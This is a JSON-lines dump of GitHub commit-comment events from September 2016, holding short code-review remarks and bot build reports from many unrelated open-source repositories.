{"id":"4567672141","type":"CommitCommentEvent","actor":{"login":"davidfestal"},"repo":{"name":"ceylon/ceylon-ide-intellij"},"payload":{"comment":{"id":19034976,"position":36,"line":262,"path":"jps-plugin/src/org/intellij/plugins/ceylon/jps/CeylonBuilder.java","commit_id":"16e5f0355fde128950d676348325ff30355074b1","created_at":"2016-09-15T12:04:58Z","updated_at":"2016-09-15T12:04:58Z","body":"I don't think so, because on the CLI, we might expect it to be retrieved from Herd, or from the user repo, or whatever. But the IDE is a specific, development-centric use-case for dependent projects: Whatever be the CLI build method, for *usability* and ease of development inside the IDE the required module is taken from the required project opened in the IDE."}},"created_at":"2016-09-15T12:04:58Z"}
{"id":"4567676652","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-interactive-video"},"payload":{"comment":{"id":19034986,"position":17,"line":179,"path":"upgrades.js","commit_id":"befbb7ae4769de826f14232a0eab1d6bb470df80","created_at":"2016-09-15T12:05:52Z","updated_at":"2016-09-15T12:05:52Z","body":"Fixed!"}},"created_at":"2016-09-15T12:05:52Z"}
{"id":"4567677014","type":"CommitCommentEvent","actor":{"login":"shachimi"},"repo":{"name":"shachimi/room25"},"payload":{"comment":{"id":19034987,"position":120,"line":475,"path":"src/board/board.cc","commit_id":"262c7f57c81f937fb1f7370969931cda8b05b50c","created_at":"2016-09-15T12:05:57Z","updated_at":"2016-09-15T12:05:57Z","body":"which pos is the (x, y)? The one we want to link? the destination of the new Cell?\r\n\r\nAlso each cell as two neighbor  by axis but your function is only linking with one side. I know because it is the extraction of a code of mine why it is done so, but if this method is destined to only get used in this case you have to at least change its name.\r\n\r\nIf you want to keep your function then at least fixed it and be careful that the cells has already a size > at the position you try to access (otherwise you can set NULL for the neightbor)"}},"created_at":"2016-09-15T12:05:57Z"}
{"id":"4567679406","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19035001,"position":4,"line":37,"path":"UM/Settings/SettingRelation.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-15T12:06:29Z","updated_at":"2016-09-15T12:06:29Z","body":"A spot of documentation on why you need to override the hash of this class would be nice"}},"created_at":"2016-09-15T12:06:29Z"}
{"id":"4567679747","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-interactive-video"},"payload":{"comment":{"id":19035002,"position":4,"line":567,"path":"Scripts/interactive-video-editor.js","commit_id":"4d9565375c0c13388faedd56dd060ca519eab152","created_at":"2016-09-15T12:06:34Z","updated_at":"2016-09-15T12:06:34Z","body":"Should be fixed now"}},"created_at":"2016-09-15T12:06:34Z"}
{"id":"4567680881","type":"CommitCommentEvent","actor":{"login":"shachimi"},"repo":{"name":"shachimi/room25"},"payload":{"comment":{"id":19035008,"position":3,"line":12,"path":"src/board/board.cc","commit_id":"262c7f57c81f937fb1f7370969931cda8b05b50c","created_at":"2016-09-15T12:06:51Z","updated_at":"2016-09-15T12:06:51Z","body":"remove this constructor for your subclasses if your going to do nothing with it"}},"created_at":"2016-09-15T12:06:51Z"}
{"id":"4567681083","type":"CommitCommentEvent","actor":{"login":"tmenjo"},"repo":{"name":"sheepdog/sheepdog"},"payload":{"comment":{"id":19035009,"position":84,"line":518,"path":"sheep/sheep.c","commit_id":"c84b4fc1021df87bba161b758fb068a4333b9ad6","created_at":"2016-09-15T12:06:53Z","updated_at":"2016-09-15T12:06:53Z","body":"I think this should be create_work_queue."}},"created_at":"2016-09-15T12:06:53Z"}
{"id":"4567681866","type":"CommitCommentEvent","actor":{"login":"alexey-pankratyev"},"repo":{"name":"alexey-pankratyev/ruby_scripts"},"payload":{"comment":{"id":19035014,"position":4,"line":13,"path":"listNodeAtRundeck/listNodeAtRundeck.rb","commit_id":"b7b6a04d6d7cebfb8baddcec64384a1a36d75a2c","created_at":"2016-09-15T12:07:06Z","updated_at":"2016-09-15T12:07:06Z","body":"!"}},"created_at":"2016-09-15T12:07:06Z"}
{"id":"4567685286","type":"CommitCommentEvent","actor":{"login":"cgogolin"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19035021,"position":246,"line":246,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-15T12:07:54Z","updated_at":"2016-09-15T12:07:54Z","body":"This should be Gaussian random with mean 0 and variance 1, not uniform random. Don't worry about speed here, you will only need to call this very few times."}},"created_at":"2016-09-15T12:07:54Z"}
{"id":"4567685696","type":"CommitCommentEvent","actor":{"login":"tmenjo"},"repo":{"name":"sheepdog/sheepdog"},"payload":{"comment":{"id":19035026,"position":91,"line":525,"path":"sheep/sheep.c","commit_id":"c84b4fc1021df87bba161b758fb068a4333b9ad6","created_at":"2016-09-15T12:08:00Z","updated_at":"2016-09-15T12:08:00Z","body":"Same as above."}},"created_at":"2016-09-15T12:08:00Z"}
{"id":"4567686086","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19035028,"position":null,"line":null,"path":null,"commit_id":"ad7d2bdeedd2b0021e459297f3ddeaf6f8e07d87","created_at":"2016-09-15T12:08:06Z","updated_at":"2016-09-15T12:08:06Z","body":"@mcostalba  .. or do you refer to the version above with the additional 4th parameter 'pinnedsColor'?\r\nShould this one be the fastest? (Sorry I'm still a rookie for this things)"}},"created_at":"2016-09-15T12:08:06Z"}
{"id":"4567689335","type":"CommitCommentEvent","actor":{"login":"daniel-k"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19035040,"position":18,"line":519,"path":"hermit/arch/x86/kernel/entry.asm","commit_id":"f3c00ac178abecbade5719ed764e334c88f75076","created_at":"2016-09-15T12:08:50Z","updated_at":"2016-09-15T12:08:50Z","body":"Why do you load the FPU state after saving it?"}},"created_at":"2016-09-15T12:08:50Z"}
{"id":"4567689531","type":"CommitCommentEvent","actor":{"login":"Dokman"},"repo":{"name":"PCSX2/pcsx2"},"payload":{"comment":{"id":19035041,"position":null,"line":null,"path":null,"commit_id":"de480ec0f5d5bc36a87587c08b9bb7dbd584889f","created_at":"2016-09-15T12:08:52Z","updated_at":"2016-09-15T12:08:52Z","body":"hahahahaha"}},"created_at":"2016-09-15T12:08:52Z"}
{"id":"4567689664","type":"CommitCommentEvent","actor":{"login":"mathias-hiron"},"repo":{"name":"France-ioi/bebras-modules"},"payload":{"comment":{"id":19035042,"position":null,"line":null,"path":null,"commit_id":"8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c","created_at":"2016-09-15T12:08:54Z","updated_at":"2016-09-15T12:08:54Z","body":"Hi Nir,\n\nYest, 1. is my desired behaviour.\n\nYou're right that something is missing. However, the destruction should\nhappen later, because the task may currently be running. So it should be\nadded to a list of subtasks to destroy when the whole task is unloaded.\n\nIt's not necessarily the old one that should be destroyed. Maybe the new\none should be the one that is created temporarily and destroyed aferrwards.\n\nCan you take care of that?\n\nThanks a lot for noticing this!\n\nMathias\n\nOn Thu, Sep 15, 2016 at 1:22 PM, Nir Lavee <notifications@github.com> wrote:\n\n> Do I understand correctly that your intention is to preempt any grading\n> that is currently running, forget that gradingTask, create another and\n> start grading a new answer?\n>\n>    1.\n>\n>    Is this the desired behavior across all tasks that are graded with\n>    callbacks? E.g. python programming, etc.\n>    2.\n>\n>    I think the current gradingTask must be properly destroyed first, via\n>    destroyTask(), otherwise there may be some undefined behavior (factories\n>    must be disposed, and unload must be called). Should I add this?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/France-ioi/bebras-modules/commit/8dc7e2251e1e5289ed8e4565f8e3dc39a3c9274c#commitcomment-19034454>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AImiDT5yZw-n72ZoiXMonV7vv5YgTwGuks5qqSp-gaJpZM4J9wcV>\n> .\n>\n"}},"created_at":"2016-09-15T12:08:54Z"}
{"id":"4567691450","type":"CommitCommentEvent","actor":{"login":"Zarel"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":19035045,"position":null,"line":null,"path":null,"commit_id":"77b59e78582cb7eaa59655cb3ff9471417b757d5","created_at":"2016-09-15T12:09:19Z","updated_at":"2016-09-15T12:09:19Z","body":"The repo I got datacenters.csv from calls them datacenters, sooooo"}},"created_at":"2016-09-15T12:09:19Z"}
{"id":"4567693278","type":"CommitCommentEvent","actor":{"login":"tmenjo"},"repo":{"name":"sheepdog/sheepdog"},"payload":{"comment":{"id":19035049,"position":102,"line":535,"path":"sheep/sheep.c","commit_id":"c84b4fc1021df87bba161b758fb068a4333b9ad6","created_at":"2016-09-15T12:09:45Z","updated_at":"2016-09-15T12:09:45Z","body":"Same as above."}},"created_at":"2016-09-15T12:09:45Z"}
{"id":"4567697881","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19035061,"position":null,"line":null,"path":null,"commit_id":"40cca331beb7b93dd0238d9f92c84024df53e3ec","created_at":"2016-09-15T12:10:48Z","updated_at":"2016-09-15T12:10:48Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/464/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T12:10:48Z"}
{"id":"4567698928","type":"CommitCommentEvent","actor":{"login":"soloapple"},"repo":{"name":"soloapple/c_sock_basic_tools"},"payload":{"comment":{"id":19035066,"position":null,"line":null,"path":null,"commit_id":"3d4a4c0cc16321fd4a86fef23679a41f66077388","created_at":"2016-09-15T12:11:02Z","updated_at":"2016-09-15T12:11:02Z","body":"include tcp and udp most useful tools, thread pool, memory pool, select and epoll examples, etc.\r\n"}},"created_at":"2016-09-15T12:11:02Z"}
{"id":"4567703845","type":"CommitCommentEvent","actor":{"login":"kodikos"},"repo":{"name":"BBC-News/alephant-renderer"},"payload":{"comment":{"id":19035079,"position":null,"line":null,"path":null,"commit_id":"01c33a4a79195c7684f0725723bdb97a6030d326","created_at":"2016-09-15T12:12:14Z","updated_at":"2016-09-15T12:12:14Z","body":"Technically, the original way it was done was the same, as it was the same mustache instance for everything - just that you only ever rendered one thing at any one time. Maybe the def mustache should be ```::Mustache.new```, but I think it has knock-ons."}},"created_at":"2016-09-15T12:12:14Z"}
{"id":"4567704073","type":"CommitCommentEvent","actor":{"login":"daniel-k"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19035080,"position":5,"line":98,"path":"hermit/include/hermit/syscall.h","commit_id":"f3c00ac178abecbade5719ed764e334c88f75076","created_at":"2016-09-15T12:12:17Z","updated_at":"2016-09-15T12:12:17Z","body":"Either include `hermit/arch/x86/include/asm/tasks_types.h` in this file or maybe move the definition of `fenv_t` here I would say."}},"created_at":"2016-09-15T12:12:17Z"}
{"id":"4567705324","type":"CommitCommentEvent","actor":{"login":"ktoso"},"repo":{"name":"ktoso/sbt-jmh"},"payload":{"comment":{"id":19035083,"position":5,"line":120,"path":"build.sbt","commit_id":"df811e20ce1affe104c5449b9c267cf93160478b","created_at":"2016-09-15T12:12:34Z","updated_at":"2016-09-15T12:12:34Z","body":"That's what I get for rushing a release, thanks Jason"}},"created_at":"2016-09-15T12:12:34Z"}
{"id":"4567705356","type":"CommitCommentEvent","actor":{"login":"fejoa"},"repo":{"name":"Attnam/ivan"},"payload":{"comment":{"id":19035084,"position":1,"line":126,"path":"FeLib/FindSDL2.cmake","commit_id":"04757df902fa0637fbf615f5289c3d18a1197e8c","created_at":"2016-09-15T12:12:34Z","updated_at":"2016-09-15T12:12:34Z","body":"It mustn't be `-lmwindows` in the linker flags. `-mwindows` goes with the linker flags, the others (`-lSDL`) etc. are library flags."}},"created_at":"2016-09-15T12:12:34Z"}
{"id":"4567706755","type":"CommitCommentEvent","actor":{"login":"Chalwk77"},"repo":{"name":"Chalwk77/HALO-SCRIPT-PROJECTS"},"payload":{"comment":{"id":19035089,"position":28,"line":28,"path":"SAPP SCRIPTS/HPC OnGameEnd messages, SAPP (BROKEN).lua","commit_id":"da706997964362dd98bca8211de511f830482cf8","created_at":"2016-09-15T12:12:54Z","updated_at":"2016-09-15T12:12:54Z","body":"I will polish this code later, at the moment I am trying to debug."}},"created_at":"2016-09-15T12:12:54Z"}
{"id":"4567708135","type":"CommitCommentEvent","actor":{"login":"shabarov"},"repo":{"name":"shabarov/progitbook"},"payload":{"comment":{"id":19035103,"position":4,"line":4,"path":"progit.txt","commit_id":"72b741c18c424de2512a0e90ea25d94ffb96eb05","created_at":"2016-09-15T12:13:14Z","updated_at":"2016-09-15T12:13:14Z","body":"my comment"}},"created_at":"2016-09-15T12:13:14Z"}
{"id":"4567710688","type":"CommitCommentEvent","actor":{"login":"cgogolin"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19035111,"position":241,"line":241,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-15T12:13:49Z","updated_at":"2016-09-15T12:13:49Z","body":"I am concerned here about the Hilbertspace. The random states we talk about here are random states from a fixed particle number subspace of the fockspace of bosons. This is not the same as a random state over the subspace spanned by the states in terms of which the WK states are written."}},"created_at":"2016-09-15T12:13:49Z"}
{"id":"4567710982","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19035113,"position":12,"line":243,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-15T12:13:54Z","updated_at":"2016-09-15T12:13:54Z","body":"Kinda like the one we have now, slightly more explict"}},"created_at":"2016-09-15T12:13:54Z"}
{"id":"4567711116","type":"CommitCommentEvent","actor":{"login":"reverendhomer"},"repo":{"name":"ozkriff/zoc"},"payload":{"comment":{"id":19035114,"position":5,"line":192,"path":"core/src/internal_state.rs","commit_id":"61c7501ca674db0505bcc070ba20755702d55c5a","created_at":"2016-09-15T12:13:56Z","updated_at":"2016-09-15T12:13:56Z","body":"http://cs4.pikabu.ru/post_img/big/2015/09/24/8/1443102931_853998381.jpg"}},"created_at":"2016-09-15T12:13:56Z"}
{"id":"4567711627","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19035115,"position":null,"line":null,"path":null,"commit_id":"ab6d796e08f2c0255f53aaeb49b4b7155c9b8e0f","created_at":"2016-09-15T12:14:03Z","updated_at":"2016-09-15T12:14:03Z","body":"Perfect - thanks!"}},"created_at":"2016-09-15T12:14:03Z"}
{"id":"4567712559","type":"CommitCommentEvent","actor":{"login":"daniel-k"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19035118,"position":4,"line":147,"path":"hermit/arch/x86/include/asm/stddef.h","commit_id":"f3c00ac178abecbade5719ed764e334c88f75076","created_at":"2016-09-15T12:14:17Z","updated_at":"2016-09-15T12:14:17Z","body":"Typo here, there's no M**S**XCSR."}},"created_at":"2016-09-15T12:14:17Z"}
{"id":"4567718297","type":"CommitCommentEvent","actor":{"login":"bquorning"},"repo":{"name":"bbatsov/rubocop"},"payload":{"comment":{"id":19035128,"position":18,"line":139,"path":"lib/rubocop/config.rb","commit_id":"e790915c543699488637008e7ed815446570c8b1","created_at":"2016-09-15T12:15:37Z","updated_at":"2016-09-15T12:15:37Z","body":"This breaks memoization when `any?` returns false. Fix in #3481."}},"created_at":"2016-09-15T12:15:37Z"}
{"id":"4567721189","type":"CommitCommentEvent","actor":{"login":"cy6erGn0m"},"repo":{"name":"Kotlin/kotlinx.html"},"payload":{"comment":{"id":19035134,"position":16,"line":16,"path":"js/src/test/kotlin/exceptions.kt","commit_id":"00f59df68aef1e0008cf5da75763b91cf7078073","created_at":"2016-09-15T12:16:18Z","updated_at":"2016-09-15T12:16:18Z","body":"there are two functions on consumer but one in js package has slightly different return type "}},"created_at":"2016-09-15T12:16:18Z"}
{"id":"4567721971","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":19035135,"position":4,"line":37,"path":"UM/Settings/SettingRelation.py","commit_id":"9fa133da046af2504fd3681d6dfbedb3a46da008","created_at":"2016-09-15T12:16:29Z","updated_at":"2016-09-15T12:16:29Z","body":"35de7e2e1f32985ba82f346922e3613834cf8480"}},"created_at":"2016-09-15T12:16:29Z"}
{"id":"4567726977","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":19035150,"position":null,"line":null,"path":null,"commit_id":"644f16fc757fff8226886b7c3fa95d98975a0076","created_at":"2016-09-15T12:17:38Z","updated_at":"2016-09-15T12:17:38Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/465/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-2018)."}},"created_at":"2016-09-15T12:17:38Z"}
{"id":"4567728194","type":"CommitCommentEvent","actor":{"login":"mawtex"},"repo":{"name":"Orckestra/C1-CMS"},"payload":{"comment":{"id":19035154,"position":null,"line":null,"path":null,"commit_id":"6dbe37e9e2a972b0a5dfbe25e32dfa986e6c881b","created_at":"2016-09-15T12:17:54Z","updated_at":"2016-09-15T12:17:54Z","body":"This will fix #226"}},"created_at":"2016-09-15T12:17:54Z"}
{"id":"4567731582","type":"CommitCommentEvent","actor":{"login":"PrimaryFeather"},"repo":{"name":"Gamua/Starling-Framework"},"payload":{"comment":{"id":19035166,"position":null,"line":null,"path":null,"commit_id":"7e20a4930db0383ac555b99cdf45c997afb07bdb","created_at":"2016-09-15T12:18:41Z","updated_at":"2016-09-15T12:18:41Z","body":"> Sorry for that i missed a names\r\n\r\nNo worries! Nevertheless, thanks a lot for the code review! :smile:"}},"created_at":"2016-09-15T12:18:41Z"}
{"id":"4567733211","type":"CommitCommentEvent","actor":{"login":"emlai"},"repo":{"name":"Attnam/ivan"},"payload":{"comment":{"id":19035169,"position":1,"line":126,"path":"FeLib/FindSDL2.cmake","commit_id":"04757df902fa0637fbf615f5289c3d18a1197e8c","created_at":"2016-09-15T12:19:08Z","updated_at":"2016-09-15T12:19:08Z","body":"Yeah I think that is incorrect, it should be `-mwindows`. I found this script somewhere on the web ([here](https://github.com/tcbrindle/sdl2-cmake-scripts) I think) and apparently it isn't entirely correct. I'll fix this and submit a pull request in that repository."}},"created_at":"2016-09-15T12:19:08Z"}
{"id":"4567734865","type":"CommitCommentEvent","actor":{"login":"mitake"},"repo":{"name":"sheepdog/sheepdog"},"payload":{"comment":{"id":19035174,"position":84,"line":518,"path":"sheep/sheep.c","commit_id":"c84b4fc1021df87bba161b758fb068a4333b9ad6","created_at":"2016-09-15T12:19:30Z","updated_at":"2016-09-15T12:19:30Z","body":"Ah, sorry for that and thanks for pointing. I'll fix it tomorrow."}},"created_at":"2016-09-15T12:19:30Z"}
{"id":"4567738564","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035184,"position":50,"line":50,"path":"KD3DTree/struct_basic_types.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:20:22Z","updated_at":"2016-09-15T12:20:22Z","body":"Operation is commutative, so can call on the previous implementation"}},"created_at":"2016-09-15T12:20:22Z"}
{"id":"4567739426","type":"CommitCommentEvent","actor":{"login":"ssbn-412-42"},"repo":{"name":"ssbn-412-42/Leaning"},"payload":{"comment":{"id":19035189,"position":null,"line":null,"path":null,"commit_id":"9b3edf492f84134dc3aaa9eb1ff979ecab5ac43a","created_at":"2016-09-15T12:20:33Z","updated_at":"2016-09-15T12:20:33Z","body":"MySQL的基本命令"}},"created_at":"2016-09-15T12:20:33Z"}
{"id":"4567741952","type":"CommitCommentEvent","actor":{"login":"messoremTsX"},"repo":{"name":"ts-x/TSX-WEB"},"payload":{"comment":{"id":19035194,"position":null,"line":null,"path":null,"commit_id":"256a41ccb76254e46d06dd9017f5cd57902ccb96","created_at":"2016-09-15T12:21:07Z","updated_at":"2016-09-15T12:21:07Z","body":"Me semblait que le afflix était important pour le position en temps réel mais apparemment non...  Au pire j'ai la sauvegarde.  Thank you "}},"created_at":"2016-09-15T12:21:07Z"}
{"id":"4567742332","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19035195,"position":16,"line":47,"path":"static/js/services/select2-search.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T12:21:12Z","updated_at":"2016-09-15T12:21:12Z","body":":-("}},"created_at":"2016-09-15T12:21:12Z"}
{"id":"4567742400","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035196,"position":35,"line":35,"path":"KD3DTree/struct_basic_types.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:21:13Z","updated_at":"2016-09-15T12:21:13Z","body":"Why marking a member function friend? And why is it a member function in the first place (am I missing something?)?"}},"created_at":"2016-09-15T12:21:13Z"}
{"id":"4567742460","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19035197,"position":null,"line":null,"path":null,"commit_id":"53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0","created_at":"2016-09-15T12:21:13Z","updated_at":"2016-09-15T12:21:13Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53b8d5a28a0e63c1c0cf23a924bc96a0e577a0d0-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T12:21:13Z"}
{"id":"4567746746","type":"CommitCommentEvent","actor":{"login":"timdiggins"},"repo":{"name":"thredded/thredded"},"payload":{"comment":{"id":19035211,"position":null,"line":null,"path":null,"commit_id":"16b9e088cb540c5374b102a03ecee66c1fb73d67","created_at":"2016-09-15T12:22:11Z","updated_at":"2016-09-15T12:22:11Z","body":"@glebm ok, got a PR #400 for that. Will merge once it's green."}},"created_at":"2016-09-15T12:22:11Z"}
{"id":"4567748040","type":"CommitCommentEvent","actor":{"login":"SCdF"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19035213,"position":24,"line":79,"path":"static/js/services/select2-search.js","commit_id":"03aad82442f821663360cdbe8cfad4c3f3538855","created_at":"2016-09-15T12:22:28Z","updated_at":"2016-09-15T12:22:28Z","body":"Yeah? Is there a philosophy around removing that, or is it aesthetics?"}},"created_at":"2016-09-15T12:22:28Z"}
{"id":"4567750008","type":"CommitCommentEvent","actor":{"login":"dstepanenko"},"repo":{"name":"ikalnitsky/Kostyor"},"payload":{"comment":{"id":19035217,"position":15,"line":15,"path":"contrib/openapi.yml","commit_id":"6a62e365d76100d1d041e06196d815f0702e2327","created_at":"2016-09-15T12:22:56Z","updated_at":"2016-09-15T12:22:56Z","body":"Shouldn't we use \"cluster\" term instead of \"Openstack Environment\" for clarity? As far as I know all the docs use \"cluster\" term.\r\nP.S.: Igor, could you please change https://github.com/sc68cal/Kostyor/blob/master/doc/source/rest_api.rst right after this doc will be finalized."}},"created_at":"2016-09-15T12:22:56Z"}
{"id":"4567751195","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035219,"position":8,"line":8,"path":"KD3DTree/struct_basic_types.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:23:13Z","updated_at":"2016-09-15T12:23:13Z","body":"Personally, I disguise having typedefs that are simply aliases."}},"created_at":"2016-09-15T12:23:13Z"}
{"id":"4567756676","type":"CommitCommentEvent","actor":{"login":"drkutuzov"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19035228,"position":28,"line":28,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-15T12:24:24Z","updated_at":"2016-09-15T12:24:24Z","body":"Dont need to create all extra variables -- it is very clear what are you doing if you write (and much shorter):\r\n\r\ndef extractSample2d(image, widthFrom, widthTo):\r\n    return delete(image, range(from, to), axis=1)"}},"created_at":"2016-09-15T12:24:24Z"}
{"id":"4567757677","type":"CommitCommentEvent","actor":{"login":"snosov1"},"repo":{"name":"IvanKamynin/KDTree"},"payload":{"comment":{"id":19035229,"position":9,"line":9,"path":"KD3DTree/struct_file.h","commit_id":"8b6f48a3351a39676ee7a02e43fba59d3a6adeaa","created_at":"2016-09-15T12:24:38Z","updated_at":"2016-09-15T12:24:38Z","body":"Any reason not to use <stdexcept>?"}},"created_at":"2016-09-15T12:24:38Z"}
{"id":"4567759294","type":"CommitCommentEvent","actor":{"login":"liusj-github"},"repo":{"name":"liusj-github/liusj-Repository"},"payload":{"comment":{"id":19035234,"position":null,"line":null,"path":null,"commit_id":"8f567f7a56da13f3878584dd2fe80946c159aeaa","created_at":"2016-09-15T12:24:57Z","updated_at":"2016-09-15T12:24:57Z","body":"add README.md"}},"created_at":"2016-09-15T12:24:57Z"}
{"id":"4567762100","type":"CommitCommentEvent","actor":{"login":"dingshanshan"},"repo":{"name":"dingshanshan/test"},"payload":{"comment":{"id":19035240,"position":1,"line":1,"path":"test.txt","commit_id":"831f879867e9c16661db0878f9f95baa64072027","created_at":"2016-09-15T12:25:34Z","updated_at":"2016-09-15T12:25:34Z","body":"在当前项目目录，以.git目录作为分界线，一分为二。.git是版本库，也就是Git仓库。\r\n.git之外所有的内容都是工作区。\r\n"}},"created_at":"2016-09-15T12:25:34Z"}
{"id":"4567762603","type":"CommitCommentEvent","actor":{"login":"ISuckAtPython"},"repo":{"name":"ktbyers/netmiko"},"payload":{"comment":{"id":19035242,"position":null,"line":null,"path":null,"commit_id":"2c590de6331091ca6563d198f5b2c2b7cd4ebbf5","created_at":"2016-09-15T12:25:40Z","updated_at":"2016-09-15T12:25:40Z","body":"Thanks, uninstalling and reinstalling as ==1.0.0 worked"}},"created_at":"2016-09-15T12:25:40Z"}
{"id":"4567762730","type":"CommitCommentEvent","actor":{"login":"zxq2233"},"repo":{"name":"aploium/zmirror"},"payload":{"comment":{"id":19035244,"position":null,"line":null,"path":null,"commit_id":"cc9691662a72afcdb8de1b68df8f20e54c4a3017","created_at":"2016-09-15T12:25:42Z","updated_at":"2016-09-15T12:25:42Z","body":"Thank you"}},"created_at":"2016-09-15T12:25:42Z"}
{"id":"4567763203","type":"CommitCommentEvent","actor":{"login":"dingshanshan"},"repo":{"name":"dingshanshan/test"},"payload":{"comment":{"id":19035246,"position":1,"line":1,"path":"test.txt","commit_id":"831f879867e9c16661db0878f9f95baa64072027","created_at":"2016-09-15T12:25:48Z","updated_at":"2016-09-15T12:25:48Z","body":"在当前项目目录，以.git目录作为分界线，一分为二。.git是版本库，也就是Git仓库。\r\n.git之外所有的内容都是工作区。\r\n"}},"created_at":"2016-09-15T12:25:48Z"}
{"id":"4567763212","type":"CommitCommentEvent","actor":{"login":"koying"},"repo":{"name":"MrMC/mrmc"},"payload":{"comment":{"id":19035247,"position":null,"line":null,"path":null,"commit_id":"a5195029320801dd502cc65b2dc3b5ca9d6d7ca8","created_at":"2016-09-15T12:25:48Z","updated_at":"2016-09-15T12:25:48Z","body":"FWIW, EAC3 7.1 RAW not working is an Android bug"}},"created_at":"2016-09-15T12:25:48Z"}
{"id":"4567763640","type":"CommitCommentEvent","actor":{"login":"dingshanshan"},"repo":{"name":"dingshanshan/test"},"payload":{"comment":{"id":19035249,"position":null,"line":null,"path":null,"commit_id":"831f879867e9c16661db0878f9f95baa64072027","created_at":"2016-09-15T12:25:54Z","updated_at":"2016-09-15T12:25:54Z","body":"在当前项目目录，以.git目录作为分界线，一分为二。.git是版本库，也就是Git仓库。\r\n.git之外所有的内容都是工作区。\r\n"}},"created_at":"2016-09-15T12:25:54Z"}
{"id":"4567764194","type":"CommitCommentEvent","actor":{"login":"Tarik02"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19035251,"position":null,"line":null,"path":null,"commit_id":"5e4bfc0a0218e6529e47a50914c203f40b04493d","created_at":"2016-09-15T12:26:01Z","updated_at":"2016-09-15T12:26:01Z","body":"Thanks."}},"created_at":"2016-09-15T12:26:01Z"}
{"id":"4567764406","type":"CommitCommentEvent","actor":{"login":"dingshanshan"},"repo":{"name":"dingshanshan/test"},"payload":{"comment":{"id":19035252,"position":null,"line":null,"path":null,"commit_id":"831f879867e9c16661db0878f9f95baa64072027","created_at":"2016-09-15T12:26:05Z","updated_at":"2016-09-15T12:26:05Z","body":"在当前项目目录，以.git目录作为分界线，一分为二。.git是版本库，也就是Git仓库。\r\n.git之外所有的内容都是工作区。\r\n"}},"created_at":"2016-09-15T12:26:05Z"}
